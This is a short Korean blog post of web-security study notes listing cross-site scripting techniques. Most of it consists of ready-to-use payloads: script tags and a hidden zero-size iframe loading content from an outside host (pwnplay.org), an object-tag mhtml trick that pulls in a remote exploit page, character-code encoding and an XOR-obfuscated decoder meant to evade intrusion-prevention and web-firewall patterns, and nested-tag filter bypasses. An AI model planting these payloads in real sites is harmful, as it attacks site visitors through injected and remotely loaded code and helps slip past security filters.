Security Study/Web

XSS 공격기법

𝓛𝓾𝓬𝓮𝓽𝓮_𝓢𝓽𝓮𝓵𝓵𝓪 2015. 12. 1.
728x90
반응형

XSS (Cross Site Scripting) 크로스 사이트 스크립트은 서버의 서비스를 공격하는 일반적인 해킹방법이 아니라 해당 서버를 사용하는 사용자를 공격하는 기법이다.


1. XSS


일반적인 공격 기법은 <script>alert("XSS")</script> 이러한 구문을 넣음으로 취약점이 있는지 알아본다.



ex) 클릭시 타사이트로 이동

<a href="http://naver.com<script src='http://pwnplay.org/test'></script>">Click</a>


2. iframe 태그


타사이트로 연결 가능하게 함


ex) 숨겨진 iframe를 이용해 타사이트로 이동

<iframe src=" http://pwnplay.org" width="0" height="0" frameborder="0"></iframe>


3. object 태그


ex) 지정한 파일이 존재하지 않을 다사이트로 이동하도록 함.

<object width=0 height=0 sytle=display:none; type=text/xscriptlet data=mk:@MSITStore:mhtml:c:\nosuchfile.mht! http://pwnplay.org/attack_chm::exploit.html></object>


4. div 기법


ex) div 태그를 사용하여 이미지 등을 삽입시킨다.

<div style="position:absolute; left:200; top:90; z-index:2;">

    <img src="images/test.jpg">

</div>


5. 인코딩 기법


ex) 공격하려는 문자열을 다른 표현으로 인코딩하여 눈에 띠지 않거나, IPS, 웹방화벽 드의 감지패턴을 우회하기 위하여 인코딩한다.


원본 : <script>alert("test");</script>

인코딩 : <script>alert(String.fromCharCode(116, 101, 115, 116))</script>


6. Obfuscated 기법


ex) 인코딩 기법과 같이 우회하기 위해 사용한다.

<s-ript language="javas-ript">

    e = '0x00' + '5F';

    str1 = "%E4%BC%B7%AA%C0%AD ....... %AA%E2";

    str = tmp = '';


    for(i=0; i<str1.length; i+=3)

    { 

        tmp = unescape(str1.slice(i,i+3));

        str = str + String.fromCharCode((tmp.charCodeAt(0)^e)-127);

    }


    document.write(str); 

</script>


7. 기타우회 방법 


;</script><script>alert("xss");</script>


<scr<script>ipt>alert("xss");</scr</script>ipt>






[참조]http://egloos.zum.com/tiger5net/v/5055050

728x90
반응형

'Security Study > Web' 카테고리의 다른 글

string filter(php)  (0) 2016.10.05
hosting 을하기위한 기본?  (0) 2015.12.13
웹 해킹 기본  (0) 2015.11.24
구글 해킹  (0) 2015.11.21
web 2일차  (0) 2015.10.23

댓글0

💲 추천 글